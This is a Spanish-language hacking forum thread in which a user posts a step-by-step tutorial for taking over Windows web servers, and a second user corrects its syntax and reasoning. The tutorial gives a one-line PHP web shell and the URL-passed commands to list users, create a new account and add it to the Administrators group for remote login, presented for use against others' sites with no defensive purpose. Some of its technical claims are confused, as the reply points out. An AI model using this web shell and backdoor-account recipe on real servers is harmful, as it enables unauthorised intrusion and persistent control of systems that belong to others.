comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Elevar privilegios en servidores windows

  • 1 Respuestas
  • 2833 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Noviembre 23, 2014, 06:46:36 pm »
Hola gente, aquí les vengo a enseñar como elevar privilegios en servidores windows.

1- Bueno primero necesitan tener subida una shell a una web o host.
2- Después tener un archivo shell server windows subido en la web o host.

El código que insertaremos es este:

Código: PHP
  1. <?php system($_GET['cmd']); ?>

Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer NT
AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web o host.

Ya realizado lo anterior ahora ponemos: website.com/archivo.php?cmd=net user para ver los usuarios que tiene el servidor VPS.

Ya que hecho esto, ponemos: website.com/archivo.php?cmd=net user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.

Bueno ya hecho esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) y hacemos lo siguiente: website.com/archivo.php?cmd=net user para ver nuestro usuario añadido si no sale es que hicieron algo mal.

Ahora hacemos esto: website.com/archivo.php?cmd=net localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.

Ahora para saber la IP del servidor VPS ponemos: website.com.com/archivo.php?cmd=ipconfig

Ya hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.

Saludos.
« Última modificación: Julio 17, 2018, 05:26:25 pm por Decode »

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #1 en: Noviembre 23, 2014, 07:41:14 pm »
Un par de cosas

El titulo mas bien tendria que ser "Elevar privilegios en servidores windows", por que da lo mismo que sea un  vps o un server compartido, etc. No todos los vps usan win.

Aca tenes error de sintaxis

Citar
- El archivo es este : <? php system  $_GET[cmd]); ?>

seria
Código: PHP
  1. <?php system($_GET['cmd']); ?>

Citar
- Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer algo así nt autorythy/system nt. O cualquiera parecido si no les sale nada o les sale nt es porque no tiene vps la página web.

Sos NT AUTHORITY\SYSTEM y queres rootear?? si ya tenes los maximos privs.

Citar
si no les sale nada o les sale nt es porque no tiene vps la página web

O_O

Averigua sobre los temas que remarque y corregi el post por favor.


 

¿Te gustó el post? COMPARTILO!



WebCruiser Enterprise V2.6.1 - Scanner de vulnerabilidades para Windows

Iniciado por PussyMagnet

Respuestas: 4
Vistas: 3021
Último mensaje Agosto 20, 2012, 02:02:30 pm
por Pr0ph3t
PENTEST BOX: herramienta de pentesting para sistemas Windows

Iniciado por Gabriela

Respuestas: 2
Vistas: 4791
Último mensaje Junio 07, 2015, 12:30:13 pm
por blackdrake
[Video] Explotando Apache Tomcat 5.5 + Acceso Root + Escalación de Privilegios

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1750
Último mensaje Julio 18, 2011, 03:09:22 pm
por LucaSthefano
[Video] Guía de Metasploit - Distccd + Escalación de Privilegios [Episodio I]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1955
Último mensaje Julio 18, 2011, 02:56:42 pm
por LucaSthefano